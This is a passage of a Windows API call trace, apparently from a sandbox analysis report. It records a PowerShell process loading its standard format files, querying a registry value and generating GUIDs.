[0079.997] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.998] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0xe67, lpOverlapped=0x0) returned 1
[0079.998] ReadFile (in: hFile=0x304, lpBuffer=0x3998f5f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3998f5f*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.998] ReadFile (in: hFile=0x304, lpBuffer=0x3999990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3999990*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.998] CloseHandle (hObject=0x304) returned 1
[0079.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
[0079.998] SetErrorMode (uMode=0x1) returned 0x1
[0079.998] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd20 | out: lpFileInformation=0xccd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
[0079.998] SetErrorMode (uMode=0x1) returned 0x1
[0079.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
[0079.998] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce08 | out: phkResult=0xcce08*=0x304) returned 0x0
[0079.998] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd8c, lpData=0x0, lpcbData=0xccd88*=0x0 | out: lpType=0xccd8c*=0x1, lpData=0x0, lpcbData=0xccd88*=0x56) returned 0x0
[0079.998] CoTaskMemAlloc (cb=0x5a) returned 0x301e40
[0079.998] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd5c, lpData=0x301e40, lpcbData=0xccd58*=0x56 | out: lpType=0xccd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd58*=0x56) returned 0x0
[0079.998] CoTaskMemFree (pv=0x301e40)
[0079.998] RegCloseKey (hKey=0x304) returned 0x0
[0079.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
[0080.001] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x700854ea, Data2=0x69a0, Data3=0x4cde, Data4=([0]=0xb9, [1]=0xf0, [2]=0xd1, [3]=0x38, [4]=0x5a, [5]=0x52, [6]=0x46, [7]=0xec))) returned 0x0
[0080.001] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xf31f68, Data2=0x1787, Data3=0x43ba, Data4=([0]=0x95, [1]=0x8a, [2]=0x2, [3]=0xf5, [4]=0xcd, [5]=0xd8, [6]=0xbb, [7]=0x5d))) returned 0x0
[0080.001] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xd082b762, Data2=0x45a1, Data3=0x43ad, Data4=([0]=0xba, [1]=0xf8, [2]=0xd, [3]=0xc7, [4]=0xa0, [5]=0x6b, [6]=0xe8, [7]=0xb))) returned 0x0
[0080.001] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xb92668b9, Data2=0xd062, Data3=0x43ca, Data4=([0]=0xa4, [1]=0x34, [2]=0x96, [3]=0xbc, [4]=0x13, [5]=0xe8, [6]=0x35, [7]=0xf1))) returned 0x0
[0080.001] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x5b13f492, Data2=0xaf90, Data3=0x456b, Data4=([0]=0xab, [1]=0x29, [2]=0x61, [3]=0xc5, [4]=0xc5, [5]=0x55, [6]=0xcf, [7]=0x7e))) returned 0x0
[0080.001] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x9b0f4a76, Data2=0xa2e2, Data3=0x4f13, Data4=([0]=0x96, [1]=0xcb, [2]=0x8d, [3]=0x88, [4]=0x79, [5]=0x32, [6]=0x3c, [7]=0x48))) returned 0x0
[0080.001] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x714f811, Data2=0xf425, Data3=0x4f78, Data4=([0]=0xa6, [1]=0x9b, [2]=0x11, [3]=0x2c, [4]=0x9d, [5]=0x55, [6]=0xef, [7]=0x91))) returned 0x0
[0080.001] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.001] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x5690d327, Data2=0xe157, Data3=0x441e, Data4=([0]=0x89, [1]=0x93, [2]=0xbd, [3]=0xb2, [4]=0x7f, [5]=0x1e, [6]=0x65, [7]=0x28))) returned 0x0
[0080.001] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x1ea55719, Data2=0x30e9, Data3=0x49ef, Data4=([0]=0x9d, [1]=0x1c, [2]=0xc1, [3]=0xfd, [4]=0xf8, [5]=0x78, [6]=0xe5, [7]=0x68))) returned 0x0
[0080.002] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x39227511, Data2=0x648d, Data3=0x4d8e, Data4=([0]=0xa4, [1]=0x9, [2]=0xc0, [3]=0xc0, [4]=0x68, [5]=0xc, [6]=0x20, [7]=0x14))) returned 0x0
[0080.002] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x8ccd633c, Data2=0x880f, Data3=0x4ccb, Data4=([0]=0x8f, [1]=0xc3, [2]=0x49, [3]=0x15, [4]=0x58, [5]=0x48, [6]=0xa9, [7]=0x9b))) returned 0x0
[0080.002] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x2a515868, Data2=0xa3c0, Data3=0x4355, Data4=([0]=0x95, [1]=0xe3, [2]=0x9e, [3]=0x88, [4]=0x7f, [5]=0x62, [6]=0x6b, [7]=0xa1))) returned 0x0
[0080.002] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x55d50493, Data2=0x904d, Data3=0x493c, Data4=([0]=0x8f, [1]=0xc4, [2]=0x31, [3]=0xed, [4]=0xf0, [5]=0xb, [6]=0x2d, [7]=0x23))) returned 0x0
[0080.002] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x54e69392, Data2=0x9160, Data3=0x4f57, Data4=([0]=0xae, [1]=0x76, [2]=0xd6, [3]=0xbf, [4]=0x3b, [5]=0xec, [6]=0xeb, [7]=0xa2))) returned 0x0
[0080.002] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x5166b9f6, Data2=0x1fc2, Data3=0x4416, Data4=([0]=0xbc, [1]=0x3c, [2]=0x89, [3]=0xf2, [4]=0x78, [5]=0xac, [6]=0xf4, [7]=0x8a))) returned 0x0
[0080.002] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xdacbc05d, Data2=0x2f95, Data3=0x4918, Data4=([0]=0x9c, [1]=0x24, [2]=0xd, [3]=0xdb, [4]=0xbc, [5]=0x87, [6]=0xf9, [7]=0x8c))) returned 0x0
[0080.002] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x1c10249c, Data2=0xa014, Data3=0x405f, Data4=([0]=0xa4, [1]=0x62, [2]=0xda, [3]=0x0, [4]=0xcc, [5]=0x9b, [6]=0x98, [7]=0x8a))) returned 0x0
[0080.003] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xafa00f60, Data2=0x7052, Data3=0x4611, Data4=([0]=0xb8, [1]=0x9, [2]=0xb9, [3]=0xf1, [4]=0x97, [5]=0x40, [6]=0x1e, [7]=0x8d))) returned 0x0
[0080.003] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xf6c436eb, Data2=0xcadf, Data3=0x4593, Data4=([0]=0x9a, [1]=0x38, [2]=0x41, [3]=0x45, [4]=0x7d, [5]=0xe8, [6]=0x8b, [7]=0x8c))) returned 0x0
[0080.003] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.003] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.003] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.003] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x38e5a8f5, Data2=0x6b3, Data3=0x4a3d, Data4=([0]=0xa6, [1]=0xb9, [2]=0xf2, [3]=0x9e, [4]=0xaf, [5]=0x45, [6]=0x32, [7]=0x8d))) returned 0x0
[0080.003] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xecdb5ca1, Data2=0xc162, Data3=0x4120, Data4=([0]=0xb9, [1]=0x70, [2]=0xe4, [3]=0xae, [4]=0x1e, [5]=0xbd, [6]=0x65, [7]=0x9e))) returned 0x0
[0080.003] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xe33e0944, Data2=0xd463, Data3=0x4ce5, Data4=([0]=0xa7, [1]=0x80, [2]=0xb3, [3]=0x6d, [4]=0x51, [5]=0x45, [6]=0x17, [7]=0x3d))) returned 0x0
[0080.004] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x7eed3fb6, Data2=0xe3a3, Data3=0x4792, Data4=([0]=0xbe, [1]=0xd1, [2]=0xe, [3]=0x34, [4]=0x6c, [5]=0xad, [6]=0x22, [7]=0xf0))) returned 0x0
[0080.004] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x9d60be16, Data2=0x856e, Data3=0x4be2, Data4=([0]=0x91, [1]=0xc5, [2]=0x45, [3]=0x61, [4]=0xc7, [5]=0xc7, [6]=0xee, [7]=0x26))) returned 0x0
[0080.004] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x2c7483ea, Data2=0x6325, Data3=0x4366, Data4=([0]=0xa7, [1]=0xbc, [2]=0x6c, [3]=0xdb, [4]=0xc5, [5]=0x47, [6]=0x0, [7]=0x49))) returned 0x0
[0080.004] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x4aaa79fb, Data2=0xbab7, Data3=0x4e06, Data4=([0]=0xab, [1]=0x8f, [2]=0x5e, [3]=0x43, [4]=0xdc, [5]=0x1, [6]=0x4e, [7]=0xed))) returned 0x0
[0080.004] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xc3e204ca, Data2=0x49f9, Data3=0x438d, Data4=([0]=0x9b, [1]=0x8f, [2]=0x4f, [3]=0xe8, [4]=0x10, [5]=0x23, [6]=0x92, [7]=0xcd))) returned 0x0
[0080.004] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xcf5ea3a1, Data2=0xfe54, Data3=0x4796, Data4=([0]=0x83, [1]=0x8f, [2]=0x65, [3]=0x27, [4]=0xe2, [5]=0x9f, [6]=0xde, [7]=0x85))) returned 0x0
[0080.004] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x58c80320, Data2=0xa8c3, Data3=0x4dbe, Data4=([0]=0x97, [1]=0x3c, [2]=0x28, [3]=0x88, [4]=0x80, [5]=0x76, [6]=0xab, [7]=0xaa))) returned 0x0
[0080.004] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x16789c0e, Data2=0x4eeb, Data3=0x4866, Data4=([0]=0x81, [1]=0xbd, [2]=0x9a, [3]=0xa4, [4]=0xfb, [5]=0x2f, [6]=0xb5, [7]=0xe6))) returned 0x0
[0080.004] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x93f86c10, Data2=0xc422, Data3=0x4c5f, Data4=([0]=0x86, [1]=0xba, [2]=0xa4, [3]=0x46, [4]=0xf0, [5]=0x1c, [6]=0xda, [7]=0x73))) returned 0x0
[0080.004] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x92d7a741, Data2=0xba17, Data3=0x4cfa, Data4=([0]=0x89, [1]=0xac, [2]=0xd3, [3]=0x36, [4]=0xe7, [5]=0x52, [6]=0x9b, [7]=0xd5))) returned 0x0
[0080.004] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.005] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xc474ff15, Data2=0x6b90, Data3=0x4608, Data4=([0]=0x8d, [1]=0x11, [2]=0xae, [3]=0x8, [4]=0x8d, [5]=0x0, [6]=0x17, [7]=0xcb))) returned 0x0
[0080.005] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.006] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.007] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x72a477a3, Data2=0xf308, Data3=0x49dd, Data4=([0]=0xbf, [1]=0x57, [2]=0x2, [3]=0xe7, [4]=0x35, [5]=0x2f, [6]=0x10, [7]=0x40))) returned 0x0
[0080.007] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.007] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xede6691c, Data2=0xca52, Data3=0x4bf7, Data4=([0]=0xbb, [1]=0x6e, [2]=0x3c, [3]=0xd6, [4]=0xd9, [5]=0x1d, [6]=0xfd, [7]=0x46))) returned 0x0
[0080.007] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x7759fe9c, Data2=0xf8a5, Data3=0x4272, Data4=([0]=0x80, [1]=0x6e, [2]=0x24, [3]=0xa5, [4]=0x96, [5]=0x89, [6]=0x3f, [7]=0xc))) returned 0x0
[0080.007] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xc2cd5f12, Data2=0xb367, Data3=0x477b, Data4=([0]=0x90, [1]=0x70, [2]=0x13, [3]=0xa6, [4]=0x8a, [5]=0x8f, [6]=0xe1, [7]=0x72))) returned 0x0
[0080.007] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xafcef401, Data2=0xf99e, Data3=0x41c0, Data4=([0]=0x87, [1]=0xdb, [2]=0x3f, [3]=0xc7, [4]=0x23, [5]=0xa0, [6]=0xb5, [7]=0x3c))) returned 0x0
[0080.007] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x22180a7d, Data2=0xb810, Data3=0x4efa, Data4=([0]=0xbf, [1]=0x5d, [2]=0x71, [3]=0xf9, [4]=0xb9, [5]=0x50, [6]=0x8b, [7]=0xad))) returned 0x0
[0080.008] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x2ea76821, Data2=0x1383, Data3=0x4833, Data4=([0]=0xac, [1]=0x5f, [2]=0x72, [3]=0x11, [4]=0x7f, [5]=0x17, [6]=0x3c, [7]=0xaa))) returned 0x0
[0080.008] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x197fe615, Data2=0xd367, Data3=0x43c1, Data4=([0]=0xb6, [1]=0x21, [2]=0xdc, [3]=0x8a, [4]=0x94, [5]=0x18, [6]=0x7f, [7]=0x62))) returned 0x0
[0080.008] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.008] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xb4ec37a4, Data2=0x9347, Data3=0x4713, Data4=([0]=0xae, [1]=0xbb, [2]=0xeb, [3]=0x15, [4]=0xc7, [5]=0xe4, [6]=0xa3, [7]=0xe9))) returned 0x0
[0080.008] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x25cea673, Data2=0xd5dd, Data3=0x48b5, Data4=([0]=0x95, [1]=0x4f, [2]=0xee, [3]=0x54, [4]=0x82, [5]=0xf9, [6]=0xb1, [7]=0x2d))) returned 0x0
[0080.008] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xa14ac438, Data2=0x7e75, Data3=0x488f, Data4=([0]=0xaa, [1]=0x1b, [2]=0x54, [3]=0x1d, [4]=0x84, [5]=0x28, [6]=0xbf, [7]=0x42))) returned 0x0
[0080.008] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xbdb5ca8a, Data2=0xf7b0, Data3=0x4913, Data4=([0]=0x9f, [1]=0x1d, [2]=0xe, [3]=0xcb, [4]=0xe9, [5]=0x19, [6]=0x6f, [7]=0x22))) returned 0x0
[0080.008] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x725937ba, Data2=0xd6e9, Data3=0x4cbd, Data4=([0]=0x8c, [1]=0xa0, [2]=0xc5, [3]=0x22, [4]=0xd8, [5]=0x93, [6]=0x73, [7]=0x5f))) returned 0x0
[0080.009] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.009] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x29e8aa46, Data2=0x514, Data3=0x48e5, Data4=([0]=0xad, [1]=0xce, [2]=0xd2, [3]=0xdd, [4]=0x9e, [5]=0xe7, [6]=0x68, [7]=0xc0))) returned 0x0
[0080.009] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x2efd609, Data2=0x42cd, Data3=0x4808, Data4=([0]=0x90, [1]=0x66, [2]=0x70, [3]=0xed, [4]=0xba, [5]=0x69, [6]=0x32, [7]=0x84))) returned 0x0
[0080.009] VirtualQuery (in: lpAddress=0xcba50, lpBuffer=0xcc910, dwLength=0x30 | out: lpBuffer=0xcc910*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.009] VirtualQuery (in: lpAddress=0xcba50, lpBuffer=0xcc910, dwLength=0x30 | out: lpBuffer=0xcc910*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.009] VirtualQuery (in: lpAddress=0xcba50, lpBuffer=0xcc910, dwLength=0x30 | out: lpBuffer=0xcc910*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.009] VirtualQuery (in: lpAddress=0xcba50, lpBuffer=0xcc910, dwLength=0x30 | out: lpBuffer=0xcc910*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.009] SetErrorMode (uMode=0x1) returned 0x1
[0080.009] SetErrorMode (uMode=0x1) returned 0x1
[0080.010] GetFileType (hFile=0x304) returned 0x1
[0080.010] ReadFile (in: hFile=0x304, lpBuffer=0x3af7928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3af7928*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0080.010] ReadFile (in: hFile=0x304, lpBuffer=0x3af7928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3af7928*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0080.010] ReadFile (in: hFile=0x304, lpBuffer=0x3af7928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3af7928*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0080.010] ReadFile (in: hFile=0x304, lpBuffer=0x3af7928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3af7928*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0080.011] ReadFile (in: hFile=0x304, lpBuffer=0x3af7928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3af7928*, lpNumberOfBytesRead=0xccd78*=0x8b4, lpOverlapped=0x0) returned 1
[0080.011] ReadFile (in: hFile=0x304, lpBuffer=0x3af6d44, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3af6d44*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0080.011] ReadFile (in: hFile=0x304, lpBuffer=0x3af7928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3af7928*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0080.011] CloseHandle (hObject=0x304) returned 1
[0080.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
[0080.011] SetErrorMode (uMode=0x1) returned 0x1
[0080.011] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd20 | out: lpFileInformation=0xccd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
[0080.011] SetErrorMode (uMode=0x1) returned 0x1
[0080.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
[0080.012] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce08 | out: phkResult=0xcce08*=0x304) returned 0x0
[0080.012] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd8c, lpData=0x0, lpcbData=0xccd88*=0x0 | out: lpType=0xccd8c*=0x1, lpData=0x0, lpcbData=0xccd88*=0x56) returned 0x0
[0080.012] CoTaskMemAlloc (cb=0x5a) returned 0x301e40
[0080.012] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd5c, lpData=0x301e40, lpcbData=0xccd58*=0x56 | out: lpType=0xccd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd58*=0x56) returned 0x0
[0080.012] CoTaskMemFree (pv=0x301e40)
[0080.012] RegCloseKey (hKey=0x304) returned 0x0
[0080.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
[0080.012] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x364326f3, Data2=0x10d2, Data3=0x435d, Data4=([0]=0xa7, [1]=0x39, [2]=0x34, [3]=0xeb, [4]=0xa2, [5]=0x7c, [6]=0xb4, [7]=0x81))) returned 0x0
[0080.012] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xdce6d59, Data2=0x9c41, Data3=0x4e7d, Data4=([0]=0x87, [1]=0x55, [2]=0x7d, [3]=0x9e, [4]=0xf1, [5]=0xb3, [6]=0x79, [7]=0x5b))) returned 0x0
[0080.013] SetErrorMode (uMode=0x1) returned 0x1
[0080.013] SetErrorMode (uMode=0x1) returned 0x1
[0080.013] GetFileType (hFile=0x304) returned 0x1
[0080.013] ReadFile (in: hFile=0x304, lpBuffer=0x3b35710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3b35710*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
